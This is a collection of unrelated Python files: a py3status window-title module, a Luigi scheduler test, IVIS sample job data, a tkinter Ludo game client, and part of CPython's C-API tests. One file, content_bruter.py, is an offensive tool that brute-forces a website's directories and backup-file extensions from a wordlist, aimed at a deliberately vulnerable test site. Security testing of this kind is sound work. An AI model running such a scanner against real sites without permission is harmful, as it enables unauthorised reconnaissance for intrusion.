        if self.parent.hide_title:
            if (
                focused.border == "normal"
                or focused.type == "workspace"
                or (
                    focused.parent.layout in ("stacked", "tabbed")
                    and len(focused.parent.nodes) > 1
                )
            ):
                focused.window_title = None
        self.update(focused)

    def update(self, window_properties):
        # Normalize the container object into the placeholder dict and only
        # wake the py3status core when something actually changed.
        window_properties = {
            "title": window_properties.window_title,
            "class": window_properties.window_class,
            "instance": window_properties.window_instance,
        }
        window_properties = self.compatibility(window_properties)
        if self.window_properties != window_properties:
            self.window_properties = window_properties
            self.parent.py3.update()

    def get_window_properties(self):
        return self.window_properties
class Msg(Ipc):
    """
    i3-msg - send messages to i3 window manager
    swaymsg - send messages to sway window manager

    Polling backend: each refresh shells out for the full layout tree and
    extracts the focused container's window properties.
    """

    def setup(self, parent):
        from json import loads as json_loads

        self.json_loads = json_loads
        # "i3msg" (normalized config value) maps back to the real binary name.
        wm_msg = {"i3msg": "i3-msg"}.get(parent.ipc, parent.ipc)
        self.tree_command = [wm_msg, "-t", "get_tree"]

    def get_window_properties(self):
        tree = self.json_loads(self.parent.py3.command_output(self.tree_command))
        focused = self.find_needle(tree)
        window_properties = focused.get(
            "window_properties", {"title": None, "class": None, "instance": None}
        )
        # hide title on containers with window title
        if self.parent.hide_title:
            # Second search with ``focused`` finds its *parent* container.
            parent = self.find_needle(tree, focused)
            if (
                focused["border"] == "normal"
                or focused["type"] == "workspace"
                or (
                    parent["layout"] in ("stacked", "tabbed")
                    and len(parent["nodes"]) > 1
                )
            ):
                window_properties["title"] = None
        window_properties = self.compatibility(window_properties)
        return window_properties

    def find_needle(self, tree, focused=None):
        # Depth-first search over the layout tree. With focused=None it returns
        # the focused container; with a focused node it returns that node's
        # parent container. Falls through to {} when nothing matches.
        if isinstance(tree, list):
            for el in tree:
                res = self.find_needle(el, focused)
                if res:
                    return res
        elif isinstance(tree, dict):
            nodes = tree["nodes"] + tree["floating_nodes"]
            if focused:
                for node in nodes:
                    if node["id"] == focused["id"]:
                        return tree
            elif tree["focused"]:
                return tree
            return self.find_needle(nodes, focused)
        return {}
class Py3status:
    """Display window properties (title, class, instance) for i3wm/sway.

    Selects an IPC backend at configuration time: the event-driven i3ipc
    library when available, otherwise polling via i3-msg/swaymsg.
    """
    # available configuration parameters
    cache_timeout = 0.5
    format = "{title}"
    hide_title = False
    max_width = None

    def post_config_hook(self):
        # ipc: specify i3ipc, i3-msg, or swaymsg, otherwise auto
        self.ipc = getattr(self, "ipc", "")
        if self.ipc in ["", "i3ipc"]:
            try:
                from i3ipc import Connection  # noqa f401, auto ipc

                self.ipc = "i3ipc"
            except Exception:
                # i3ipc unavailable: fall through to msg backends unless the
                # user explicitly asked for i3ipc, in which case re-raise.
                if self.ipc:
                    raise  # module not found
        self.ipc = (self.ipc or self.py3.get_wm_msg()).replace("-", "")
        if self.ipc in ["i3ipc"]:
            self.backend = I3ipc(self)
        elif self.ipc in ["i3msg", "swaymsg"]:
            self.backend = Msg(self)
        else:
            raise Exception(STRING_ERROR.format(self.ipc))

    def window(self):
        # py3status entry point: delegate to the chosen backend.
        window_properties = self.backend.get_window_properties()
        return {
            "cached_until": self.py3.time_in(self.cache_timeout),
            "full_text": self.py3.safe_format(self.format, window_properties),
        }
if __name__ == "__main__":
"""
Specify --ipc [i3ipc|i3msg|swaymsg].
"""
from sys import argv
config = {"format": "\[{ipc}\] [\?color=pink {title}]"}
for index, arg in enumerate(argv):
if "--ipc" in arg:
config["ipc"] = argv[index + 1]
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status, config=config)
|
worker_keep_alive_test.py | # -*- coding: utf-8 -*-
#
# Copyright 2016 VNG Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import LuigiTestCase
from luigi.scheduler import Scheduler
from luigi.worker import Worker
import luigi
import threading
class WorkerKeepAliveUpstreamTest(LuigiTestCase):
    """
    Tests related to how the worker stays alive after upstream status changes.
    See https://github.com/spotify/luigi/pull/1789
    """

    def run(self, result=None):
        """
        Common setup code. Overrides unittest's run() because the Worker is a
        context manager and therefore can't be opened/closed in setUp/tearDown.
        """
        self.sch = Scheduler(retry_delay=0.00000001, retry_count=2)
        with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0) as w:
            self.w = w
            super(WorkerKeepAliveUpstreamTest, self).run(result)

    def test_alive_while_has_failure(self):
        """
        One dependency disables and one fails: the keep-alive worker must keep
        running, because the failed task is still retryable.
        """
        class Disabler(luigi.Task):
            pass

        class Failer(luigi.Task):
            did_run = False

            def run(self):
                self.did_run = True

        class Wrapper(luigi.WrapperTask):
            def requires(self):
                return (Disabler(), Failer())

        self.w.add(Wrapper())
        disabler = Disabler().task_id
        failer = Failer().task_id
        # retry_count=2, so two FAILED reports (with a prune in between) disable the task.
        self.sch.add_task(disabler, 'FAILED', worker='X')
        self.sch.prune()  # Make scheduler unfail the disabled task
        self.sch.add_task(disabler, 'FAILED', worker='X')  # Disable it
        self.sch.add_task(failer, 'FAILED', worker='X')  # Fail it
        try:
            t = threading.Thread(target=self.w.run)
            t.start()
            t.join(timeout=1)  # Wait 1 second
            self.assertTrue(t.is_alive())  # It shouldn't stop trying, the failed task should be retried!
            self.assertFalse(Failer.did_run)  # It should never have run, the cooldown is longer than a second.
        finally:
            self.sch.prune()  # Make it, like die. Couldn't find a more forceful way to do this.
            t.join(timeout=1)  # Wait 1 second
            assert not t.is_alive()

    def test_alive_while_has_success(self):
        """
        One dependency disables and one succeeds: the worker should shut down,
        since no remaining work can ever become runnable.
        """
        # TODO: Fix copy paste mess
        class Disabler(luigi.Task):
            pass

        class Succeeder(luigi.Task):
            did_run = False

            def run(self):
                self.did_run = True

        class Wrapper(luigi.WrapperTask):
            def requires(self):
                return (Disabler(), Succeeder())

        self.w.add(Wrapper())
        disabler = Disabler().task_id
        succeeder = Succeeder().task_id
        self.sch.add_task(disabler, 'FAILED', worker='X')
        self.sch.prune()  # Make scheduler unfail the disabled task
        self.sch.add_task(disabler, 'FAILED', worker='X')  # Disable it
        self.sch.add_task(succeeder, 'DONE', worker='X')  # Mark it done
        try:
            t = threading.Thread(target=self.w.run)
            t.start()
            t.join(timeout=1)  # Wait 1 second
            self.assertFalse(t.is_alive())  # The worker should think that it should stop ...
            # ... because in this case the only work remaining depends on DISABLED tasks,
            # hence it's not worth considering the wrapper task as a PENDING task to
            # keep the worker alive anymore.
            self.assertFalse(Succeeder.did_run)  # It should never have run, it succeeded already
        finally:
            self.sch.prune()  # This shouldnt be necessary in this version, but whatevs
            t.join(timeout=1)  # Wait 1 second
            assert not t.is_alive()
|
ivis_data.py | """
Contains samples of IVIS requests and responses used for testing the IVIS interface
"""
SAMPLE_JOB_ID = "job1"
SAMPLE_JOB_INTERVAL = 10
SAMPLE_JOB_PARAMETERS = '''
[
{
"id": "sigSet",
"label": "Signal Set",
"type": "signalSet"
},
{
"id": "ts_signal",
"label": "TS signal",
"type": "signal",
"signalSetRef": "sigSet"
},
{
"id": "source_signal",
"label": "Source signal",
"type": "signal",
"signalSetRef": "sigSet"
},
{
"id": "window",
"label": "Window",
"type": "string"
}
]
'''
'''
[
{
"id": "dataset",
"label": "Dataset",
"type": "string"
}
]
'''
SAMPLE_JOB_CONFIG = '''
{
"params": {
"sigSet": "example_set",
"ts_signal": "ts",
"source_signal": "source",
"window": 4
},
"entities": {
"signalSets": {
"example_set": {
"index": "signal_set_1",
"name": "Example set",
"namespace": 1
}
},
"signals": {
"example_set": {
"source": {
"field": "s1",
"name": "Source of values",
"namespace": 1
},
"ts": {
"field": "s2",
"name": "Timestamp",
"namespace": 1
}
}
}
},
"state": null,
"es": {
"host": "localhost",
"port": "9200"
}
}
'''
SAMPLE_JOB_STATE = """
{
"index": "signal_set_2",
"type": "_doc",
"fields": {
"mean": "s3"
},
"last": 1.234,
"values": [1, 2, 3, 4]
}
"""
"""
{"params": {"dataset": "ds1"}}
"""
SAMPLE_JOB_CREATE_SS_REQUEST = '''
{
"type": "sets",
"sigSet": {
"cid" : "moving_average",
"name" : "moving average" ,
"namespace": 1,
"description" : "moving average" ,
"aggs": "0",
"signals": [
{
"cid": "mean",
"name": "mean",
"description": "mean",
"namespace": 1,
"type": "raw_double",
"indexed": false,
"settings": {}
}
]
}
}
'''
SAMPLE_JOB_CREATE_SS_RESPONSE = '''
{
"index": "signal_set_2",
"type": "_doc",
"fields": {
"mean": "s3"
}
}
'''
'''
{
"id": 1,
"type": "store",
"state": {
"index": "signal_set_2",
"type": "_doc",
"fields": {
"created_signal": "s3"
}
}
}
'''
'''
{
settings: { params: [], jsx: "'use strict';\n", scss: '' },
name: 'tmp',
elevated_access: 1,
type: 'jsx',
namespace: 1,
description: '',
originalHash: '7ea1949a41c2b0c3ddd392f5721234ccb6e879733f37b7e95738d98c5e7cd813',
id: 1
}
'''
SAMPLE_JOB_CODE = '''
standalone = False
if standalone:
from cloud_controller.middleware.helpers import setup_logging
from cloud_controller.middleware.ivis_pb2 import RunRequest
from cloud_controller.ivis.ivis_mock import IvisCoreMock
from cloud_controller.ivis.ivis_data import SAMPLE_JOB_CONFIG
setup_logging()
ivis_core = IvisCoreMock()
from threading import RLock, Thread
from time import perf_counter, sleep
from typing import Dict, List
class Elasticsearch:
def __init__(self, config):
print(f"Connected to Elastic Search at {config[0]['host']}:{config[0]['port']}")
self.items: List[Dict[str, Dict]] = []
self.means: List[Dict[str, float]] = []
self.last_index = 0
self.last_value = 0
self.lock = RLock()
for i in range(10):
self.add_next_item()
self.generator_thread = Thread(target=self.generator, args=(), daemon=True)
self.generator_thread.start()
def get_new_items(self):
with self.lock:
previous_index = self.last_index
self.last_index = len(self.items)
return self.items[previous_index:self.last_index]
def add_next_item(self):
self.last_value += 1
with self.lock:
self.items.append(
{
"_source": {
"s1": self.last_value,
"s2": perf_counter()
}
}
)
def generator(self):
while True:
self.add_next_item()
sleep(2)
def index(self, index, doc_type, body):
self.means.append(body)
class helpers:
@staticmethod
def scan(es: Elasticsearch, preserve_order: bool, query, index: str) -> List[Dict[str, Dict]]:
# if 'range' in query['query']:
# starting_time = query['query']['range']['s2']['gt']
return es.get_new_items()
print("reading")
import sys
import os
import json
from collections import deque
# Get parameters and set up elasticsearch
print("reading")
if not standalone:
fd = int(sys.argv[1])
data = json.loads(sys.stdin.readline())
else:
data = json.loads(SAMPLE_JOB_CONFIG)
print("setting up ES")
es = Elasticsearch([{'host': data['es']['host'], 'port': int(data['es']['port'])}])
state = data.get('state')
params = data['params']
entities = data['entities']
# Task parameters' values
# from params we get cid of signal/signal set and from according key in entities dictionary
# we can access data for that entity (like es index or namespace)
sig_set = entities['signalSets'][params['sigSet']]
ts = entities['signals'][params['sigSet']][params['ts_signal']]
source = entities['signals'][params['sigSet']][params['source_signal']]
window = int(params['window'])
values = [] # TODO: what is values? Add to the state
if state is not None and "values" in state:
values = state["values"]
print("creating deque")
queue = deque(values, maxlen=window)
if state is None or state.get('index') is None:
ns = sig_set['namespace']
msg = {}
msg['type'] = 'sets'
# Request new signal set creation
msg['sigSet'] = {
"cid": "moving_average",
"name": "moving average",
"namespace": ns,
"description": "moving average",
"aggs": "0"
}
signals = []
signals.append({
"cid": "mean",
"name": "mean",
"description": "mean",
"namespace": ns,
"type": "raw_double",
"indexed": False,
"settings": {}
})
msg['sigSet']['signals'] = signals
if standalone:
run_response = ivis_core.HandleRunRequest(RunRequest(
job_id="job1",
request=json.dumps(msg)
), None)
state = json.loads(run_response.response)
else:
ret = os.write(fd, (json.dumps(msg) + '\\n').encode())
print(f"written {ret} chars")
print("loading json from stdin")
print(json.dumps(msg))
state = json.loads(sys.stdin.readline())
print("checking error")
error = state.get('error')
if error:
sys.stderr.write(error + "\\n")
sys.exit(1)
last = None
if state is not None and state.get('last') is not None:
last = state['last']
query_content = {
"range": {
ts['field']: {
"gt": last
}
}
}
else:
query_content = {'match_all': {}}
query = {
'size': 10000,
'_source': [source['field'], ts['field']],
'sort': [{ts['field']: 'asc'}],
'query': query_content
}
print("scanning with query")
results = helpers.scan(es,
preserve_order=True,
query=query,
index=sig_set['index']
)
i = 0
print("composing state")
for item in results:
last = item["_source"][ts['field']]
val = item["_source"][source['field']]
if val is not None:
queue.append(val)
else:
continue
if i < (window - 1):
i += 1
else:
mean = sum(queue) / float(window)
doc = {
state['fields']['mean']: mean
}
res = es.index(index=state['index'], doc_type='_doc', body=doc)
state["last"] = last
state["values"] = list(queue)
# Request to store state
msg = {}
msg["type"] = "store"
msg["id"] = 1
msg["state"] = state
print("writing result")
if standalone:
run_response = ivis_core.HandleRunRequest(RunRequest(
job_id="job1",
request=json.dumps(msg)
), None)
print(f"Response:\\n{run_response.response}")
else:
ret = os.write(fd, (json.dumps(msg) + '\\n').encode())
os.close(fd)
'''
|
content_bruter.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
import urllib
import threading
import Queue
# Number of concurrent brute-force threads.
threads = 5
target_url = "http://testphp.vulnweb.com"
wordlist_file = "/tmp/all.txt"  # from SVNDigger
# Set to a word to resume a previous run from that point in the wordlist.
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
def build_wordlist(wordlist_file):
    # Read the wordlist file into a thread-safe queue.
    # If the global ``resume`` is set, skip everything up to and including
    # that word so an interrupted run can be continued.
    fd = open(wordlist_file,"rb")
    raw_words = fd.readlines()
    fd.close()
    found_resume = False
    words = Queue.Queue()
    for word in raw_words:
        word = word.rstrip()
        if resume is not None:
            if found_resume:
                words.put(word)
            else:
                if word == resume:
                    found_resume = True
                    print "Resuming wordlist from: %s" % resume
        else:
            words.put(word)
    return words
def dir_bruter(extensions=None):
    # Worker thread body: drain the shared word_queue, requesting each
    # candidate path (and optional extension variants) against target_url.
    # NOTE: Python 2 code (print statements, urllib2, ``except X,e`` syntax).
    while not word_queue.empty():
        attempt = word_queue.get()
        attempt_list = []
        # Check whether the word has a file extension; if not, treat it as a
        # directory path to brute-force.
        if "." not in attempt:
            attempt_list.append("/%s/" % attempt)
        else:
            attempt_list.append("/%s" % attempt)
        # If we want to brute-force extensions as well
        if extensions:
            for extension in extensions:
                attempt_list.append("/%s%s" % (attempt,extension))
        # Iterate over the list of candidate paths we built
        for brute in attempt_list:
            url = "%s%s" % (target_url,urllib.quote(brute))
            try:
                headers = {}
                headers["User-Agent"] = user_agent
                r = urllib2.Request(url,headers=headers)
                response = urllib2.urlopen(r)
                # Only report URLs that return a non-empty body.
                if len(response.read()):
                    print "[%d] => %s" % (response.code,url)
            except urllib2.HTTPError,e:
                # 404s are expected; report any other HTTP error status.
                if e.code != 404:
                    print "!!! %d => %s" % (e.code,url)
                pass
# Entry point: load the wordlist once, then fan out worker threads that
# all consume from the same queue.
word_queue = build_wordlist(wordlist_file)
extensions = [".php",".bak",".orig",".inc"]
for i in range(threads):
    t = threading.Thread(target=dir_bruter,args=(extensions,))
    t.start()
|
client.py | #-----------------Boilerplate Code Start-----------
import socket
from tkinter import *
from threading import Thread
import random
from PIL import ImageTk, Image
screen_width = None
screen_height = None
SERVER = None
PORT = None
IP_ADDRESS = None
playerName = None
canvas1 = None
canvas2 = None
nameEntry = None
nameWindow = None
gameWindow = None
leftBoxes = []
rightBoxes = []
finishingBox = None
playerType = None
dice = None
def leftBoard():
    """Draw the 11 left-hand track boxes; index 0 is the red start box (player 1)."""
    global gameWindow
    global leftBoxes
    global screen_height
    xPos = 30
    for box in range(0,11):
        if(box == 0):
            boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="red")
            boxLabel.place(x=xPos, y=screen_height/2 - 88)
            leftBoxes.append(boxLabel)
            xPos +=50
        else:
            boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
            boxLabel.place(x=xPos, y=screen_height/2- 100)
            leftBoxes.append(boxLabel)
            xPos +=75
def rightBoard():
    """Draw the 11 right-hand track boxes; the last one is the yellow start box (player 2)."""
    global gameWindow
    global rightBoxes
    global screen_height
    xPos = 988
    for box in range(0,11):
        if(box == 10):
            boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="yellow")
            boxLabel.place(x=xPos, y=screen_height/2-88)
            rightBoxes.append(boxLabel)
            xPos +=50
        else:
            boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
            boxLabel.place(x=xPos, y=screen_height/2 - 100)
            rightBoxes.append(boxLabel)
            xPos +=75
def finishingBox():
    """Draw the central green "Home" box.

    NOTE(review): this function rebinds the module-level ``finishingBox`` name
    (function -> Label), so it can only be called once — verify this is intended.
    """
    global gameWindow
    global finishingBox
    global screen_width
    global screen_height
    finishingBox = Label(gameWindow, text="Home", font=("Chalkboard SE", 32), width=8, height=4, borderwidth=0, bg="green", fg="white")
    finishingBox.place(x=screen_width/2 - 68, y=screen_height/2 -160)
def gameWindow():
    """Build the fullscreen game window: background, boards, home box, dice.

    NOTE(review): rebinds the module-level ``gameWindow`` name (function -> Tk
    window), so a second call would fail. Also ``rollButton`` is referenced below
    without being defined in this scope or declared global — if the player1/
    playerTurn branch is taken on first entry this raises NameError; verify.
    """
    global gameWindow
    global canvas2
    global screen_width
    global screen_height
    global dice
    gameWindow = Tk()
    gameWindow.title("Ludo Ladder")
    gameWindow.attributes('-fullscreen',True)
    screen_width = gameWindow.winfo_screenwidth()
    screen_height = gameWindow.winfo_screenheight()
    bg = ImageTk.PhotoImage(file = "./assets/background.png")
    canvas2 = Canvas( gameWindow, width = 500,height = 500)
    canvas2.pack(fill = "both", expand = True)
    # Display image
    canvas2.create_image( 0, 0, image = bg, anchor = "nw")
    # Add Text
    canvas2.create_text( screen_width/2, screen_height/5, text = "Ludo Ladder", font=("Chalkboard SE",100), fill="white")
    # Teacher Activity
    leftBoard()
    rightBoard()
    finishingBox()
    global playerTurn
    global playerType
    global playerName
    if(playerType == 'player1' and playerTurn):
        rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
    else:
        rollButton.pack_forget()
    # Creating Dice with value 1
    dice = canvas2.create_text(screen_width/2 + 10, screen_height/2 + 100, text = "\u2680", font=("Chalkboard SE",250), fill="white")
    gameWindow.resizable(True, True)
    gameWindow.mainloop()
def saveName():
    """Save button callback: read the entered name, send it to the server, and
    replace the name window with the game window."""
    global SERVER
    global playerName
    global nameWindow
    global nameEntry
    playerName = nameEntry.get()
    nameEntry.delete(0, END)
    nameWindow.destroy()
    SERVER.send(playerName.encode())
    # Boilerplate Code
    gameWindow()
def askPlayerName():
    """Show the fullscreen name-entry window (blocks in mainloop until saved)."""
    global playerName
    global nameEntry
    global nameWindow
    global canvas1
    nameWindow = Tk()
    nameWindow.title("Ludo Ladder")
    nameWindow.attributes('-fullscreen',True)
    screen_width = nameWindow.winfo_screenwidth()
    screen_height = nameWindow.winfo_screenheight()
    bg = ImageTk.PhotoImage(file = "./assets/background.png")
    canvas1 = Canvas( nameWindow, width = 500,height = 500)
    canvas1.pack(fill = "both", expand = True)
    # Display image
    canvas1.create_image( 0, 0, image = bg, anchor = "nw")
    canvas1.create_text( screen_width/2, screen_height/5, text = "Enter Name", font=("Chalkboard SE",100), fill="white")
    nameEntry = Entry(nameWindow, width=15, justify='center', font=('Chalkboard SE', 50), bd=5, bg='white')
    nameEntry.place(x = screen_width/2 - 220, y=screen_height/4 + 100)
    button = Button(nameWindow, text="Save", font=("Chalkboard SE", 30),width=15, command=saveName, height=2, bg="#80deea", bd=3)
    button.place(x = screen_width/2 - 130, y=screen_height/2 - 30)
    nameWindow.resizable(True, True)
    nameWindow.mainloop()
# Boilerplate Code
def recivedMsg():
    """Background thread: react to messages pushed by the game server.

    Message kinds (all plain strings):
      * a dict literal containing 'player_type' and 'turn' (initial handshake),
      * a dice glyph (U+2680..U+2685) that updates the dice display,
      * 'player1Turn'/'player2Turn' notifications that re-show the
        "Roll Dice" button for the matching player.
    Runs until the server closes the connection.
    """
    import ast  # stdlib; used to parse the handshake dict safely
    global SERVER
    global playerType
    global playerTurn
    global rollButton
    global screen_width
    global screen_height
    global canvas2
    global dice
    global gameWindow
    while True:
        message = SERVER.recv(2048).decode()
        if not message:
            # recv() returns b'' once the server closes the socket; without
            # this check the loop would spin forever on empty strings.
            break
        if('player_type' in message):
            # The server sends a dict literal, e.g.
            # "{'player_type': 'player1', 'turn': True}". Use
            # ast.literal_eval instead of eval(): this data arrives over the
            # network and eval() would execute arbitrary expressions.
            recvMsg = ast.literal_eval(message)
            playerType = recvMsg['player_type']
            playerTurn = recvMsg['turn']
        elif('⚀' in message):
            # Dice with value 1
            canvas2.itemconfigure(dice, text='\u2680')
        elif('⚁' in message):
            # Dice with value 2
            canvas2.itemconfigure(dice, text='\u2681')
        elif('⚂' in message):
            # Dice with value 3
            canvas2.itemconfigure(dice, text='\u2682')
        elif('⚃' in message):
            # Dice with value 4
            canvas2.itemconfigure(dice, text='\u2683')
        elif('⚄' in message):
            # Dice with value 5
            canvas2.itemconfigure(dice, text='\u2684')
        elif('⚅' in message):
            # Dice with value 6
            canvas2.itemconfigure(dice, text='\u2685')
        if('player1Turn' in message and playerType == 'player1'):
            playerTurn = True
            # NOTE(review): a fresh Button is created on every turn and the
            # previous widgets are never destroyed; consider reusing one.
            rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
            rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
        elif('player2Turn' in message and playerType == 'player2'):
            playerTurn = True
            rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
            rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 260)
def setup():
    """Connect to the Ludo server and start the client.

    Opens the TCP connection, spawns the background receiver thread, and
    then prompts the player for a name (which blocks in Tk's mainloop).
    """
    global SERVER
    global PORT
    global IP_ADDRESS
    # Server endpoint is assumed local; change these to play over a network.
    PORT = 6000
    IP_ADDRESS = '127.0.0.1'
    SERVER = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    SERVER.connect((IP_ADDRESS, PORT))
    # Receive server messages concurrently with the Tk UI.
    thread = Thread(target=recivedMsg)
    thread.start()
    askPlayerName()
# Script entry point: connect to the server and launch the UI.
setup()
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import namedtuple, OrderedDict
import os
import pickle
import platform
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
# _posixsubprocess is a CPython-internal accelerator module; it may be
# missing on some platforms/builds, so treat it as optional.
try:
    import _posixsubprocess
except ImportError:
    _posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
# sys.gettotalrefcount only exists in debug builds.
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
    # Wrap plain callables with _testcapi.instancemethod (PyInstanceMethod_Type)
    # so that attribute lookup on an instance binds them like instance methods.
    id = _testcapi.instancemethod(id)
    testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
    """Assorted Python/C API regression tests driven through _testcapi."""
    def test_instancemethod(self):
        inst = InstanceMethod()
        self.assertEqual(id(inst), inst.id())
        self.assertTrue(inst.testfunction() is inst)
        self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
        self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
        InstanceMethod.testfunction.attribute = "test"
        self.assertEqual(testfunction.attribute, "test")
        self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
    def test_no_FatalError_infinite_loop(self):
        with support.SuppressCrashReport():
            p = subprocess.Popen([sys.executable, "-c",
                                  'import _testcapi;'
                                  '_testcapi.crash_no_current_thread()'],
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
            (out, err) = p.communicate()
        self.assertEqual(out, b'')
        # This used to cause an infinite loop.
        self.assertTrue(err.rstrip().startswith(
                         b'Fatal Python error:'
                         b' PyThreadState_Get: no current thread'))
    def test_memoryview_from_NULL_pointer(self):
        self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
    def test_exc_info(self):
        raised_exception = ValueError("5")
        new_exc = TypeError("TEST")
        try:
            raise raised_exception
        except ValueError as e:
            tb = e.__traceback__
            orig_sys_exc_info = sys.exc_info()
            orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
            new_sys_exc_info = sys.exc_info()
            new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
            reset_sys_exc_info = sys.exc_info()
            self.assertEqual(orig_exc_info[1], e)
            self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
            self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
            self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
            self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
            self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
        else:
            # The raise above must always reach the except branch.
            self.assertTrue(False)
    @unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
    def test_seq_bytes_to_charp_array(self):
        # Issue #15732: crash in _PySequence_BytesToCharpArray()
        class Z(object):
            def __len__(self):
                return 1
        self.assertRaises(TypeError, _posixsubprocess.fork_exec,
                          1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
        # Issue #15736: overflow in _PySequence_BytesToCharpArray()
        class Z(object):
            def __len__(self):
                return sys.maxsize
            def __getitem__(self, i):
                return b'x'
        self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
                          1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
    @unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
    def test_subprocess_fork_exec(self):
        class Z(object):
            def __len__(self):
                return 1
        # Issue #15738: crash in subprocess_fork_exec()
        self.assertRaises(TypeError, _posixsubprocess.fork_exec,
                          Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
    @unittest.skipIf(MISSING_C_DOCSTRINGS,
                     "Signature information for builtins requires docstrings")
    def test_docstring_signature_parsing(self):
        self.assertEqual(_testcapi.no_docstring.__doc__, None)
        self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
        self.assertEqual(_testcapi.docstring_empty.__doc__, None)
        self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
        self.assertEqual(_testcapi.docstring_no_signature.__doc__,
            "This docstring has no signature.")
        self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
        self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
            "docstring_with_invalid_signature($module, /, boo)\n"
            "\n"
            "This docstring has an invalid signature."
            )
        self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
        self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
            "docstring_with_invalid_signature2($module, /, boo)\n"
            "\n"
            "--\n"
            "\n"
            "This docstring also has an invalid signature."
            )
        self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
        self.assertEqual(_testcapi.docstring_with_signature.__doc__,
            "This docstring has a valid signature.")
        self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
        self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
        self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
            "($module, /, sig)")
        self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
            "\nThis docstring has a valid signature and some extra newlines.")
        self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
            "($module, /, parameter)")
    def test_c_type_with_matrix_multiplication(self):
        M = _testcapi.matmulType
        m1 = M()
        m2 = M()
        self.assertEqual(m1 @ m2, ("matmul", m1, m2))
        self.assertEqual(m1 @ 42, ("matmul", m1, 42))
        self.assertEqual(42 @ m1, ("matmul", 42, m1))
        o = m1
        o @= m2
        self.assertEqual(o, ("imatmul", m1, m2))
        o = m1
        o @= 42
        self.assertEqual(o, ("imatmul", m1, 42))
        o = 42
        o @= m1
        self.assertEqual(o, ("matmul", 42, m1))
    def test_return_null_without_error(self):
        # Issue #23571: A function must not return NULL without setting an
        # error
        if Py_DEBUG:
            code = textwrap.dedent("""
                import _testcapi
                from test import support
                with support.SuppressCrashReport():
                    _testcapi.return_null_without_error()
            """)
            rc, out, err = assert_python_failure('-c', code)
            self.assertRegex(err.replace(b'\r', b''),
                             br'Fatal Python error: a function returned NULL '
                             br'without setting an error\n'
                             br'SystemError: <built-in function '
                             br'return_null_without_error> returned NULL '
                             br'without setting an error\n'
                             br'\n'
                             br'Current thread.*:\n'
                             br' File .*", line 6 in <module>')
        else:
            with self.assertRaises(SystemError) as cm:
                _testcapi.return_null_without_error()
            self.assertRegex(str(cm.exception),
                             'return_null_without_error.* '
                             'returned NULL without setting an error')
    def test_return_result_with_error(self):
        # Issue #23571: A function must not return a result with an error set
        if Py_DEBUG:
            code = textwrap.dedent("""
